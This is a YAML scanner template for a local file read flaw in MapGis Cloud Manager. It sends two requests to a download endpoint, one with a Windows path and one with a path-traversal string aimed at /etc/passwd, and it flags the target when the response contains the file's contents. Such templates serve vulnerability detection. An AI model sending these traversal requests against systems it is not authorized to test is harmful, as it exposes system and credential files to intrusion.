id: mapgis-cloud-manager-local-file-read

info:
  name: MapGis Cloud Manager Local File Read
  author: zan8in
  severity: high
  tags: mapgis,cloud,lfi

rules:
  r0:
    request:
      method: GET
      path: /manager/api/file/download?path=c:/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
  r1:
    request:
      method: GET
      path: /manager/api/file/download?path=/../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()